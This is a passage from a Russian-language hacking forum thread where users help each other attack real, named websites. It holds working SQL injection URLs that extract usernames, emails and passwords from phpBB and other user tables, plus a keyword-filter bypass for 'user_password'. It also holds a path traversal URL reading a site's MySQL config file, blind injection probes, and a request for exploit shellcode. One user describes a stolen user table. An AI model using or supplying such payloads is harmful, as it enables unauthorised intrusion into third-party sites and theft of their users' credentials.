Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    посмотри постом что передается..
     
  2. Wildking

    Wildking New Member

    Joined:
    11 Feb 2011
    Messages:
    22
    Likes Received:
    4
    Reputations:
    0
    И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?
     
  3. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    как вывести информацию через xpatch injection там вроде в xml данные зранятся можно с примером
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9,10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

    так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
     
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
     
    #16105 Дирижабль, 16 Feb 2011
    Last edited: 16 Feb 2011
    2 people like this.
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql
     
    _________________________
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    если я правильно понимаю, то:
    1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='имя базы'
    2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+from+database_name.table_name
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:
    _http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database(),user()),3,4,concat_ws(0x3a,name,password)+from+users--

    а админка на WP:
    _http://www.indiagatebkk.com/blog/wp-login.php
     
    _________________________
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    там одна база
    http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name%29+from+information_schema.schemata--

    грамотней попытайся задать вопрос
     
  10. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?
     
  11. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    подскажите,
    _http://www.kemtipp.ru/news.php?id=152' здесь чтот выжать можно? чет у меня запросы не проходят
     
  12. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    на тебе,

    ht_tp://www.kemtipp.ru/show.php?f=../../../../var/www/default/mysql_data.php
     
  13. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Можно ли обойти эту авторизацию? Яваскрипт практически не знаю...
    И почему value постоянно пустая? И сравнивается с пустой...
    PHP:
    function validate_auth(frm) {   var value '';   var errFlag = new Array();   var _qfGroups = {};   _qfMsg '';    value frm.elements['login'].value;   if (value == '' && !errFlag['login']) {     errFlag['login'] = true;     _qfMsg _qfMsg '\n - Введите логин';   }    value frm.elements['pass'].value;   if (value == '' && !errFlag['pass']) {     errFlag['pass'] = true;     _qfMsg _qfMsg '\n - Введите пароль';   }    if (_qfMsg != '') {     _qfMsg 'Форма заполнена неправильно:' _qfMsg;     _qfMsg _qfMsg '\n';     alert(_qfMsg);     return false;   }   return true; } //]]> </script> <form  action="http://www.site/admin/" method="post" name="auth" id="auth" onsubmit="try { var myValidator = validate_auth; } catch(e) { return true; } return myValidator(this);"> 
     
  14. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    если чтото в яваскрипте то ты его можешь просто отключить, но бегло просмотрев там проверяется только введен ли логин/пасс или нет
     
  15. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Ну да, ведь паса нет. Отключать тоже пробовал, вместо логина паса значение логина и паса становится _qfMsg.

    Всеравно, спасибо)
     
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    как в blind sql injection проверить длину слова т.е. сколько символов содержит?
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    1+and+length(@@version)=16
    если версия содержит 16 символов вернет true
     
    1 person likes this.
  18. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    спс а как узнать длину таблицы любой?

    /**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--

    так не работает
     
  19. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    1+and+(select+length(table_name)+from+information_schema.tables+limit+0,1)=14
     
    1 person likes this.
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Слил mysql дамп табдици юзеров, а как можно снеё выдернуть только нужные колонки и сохранит в формате user;mail;pass?
     
    _________________________
Thread Status:
Not open for further replies.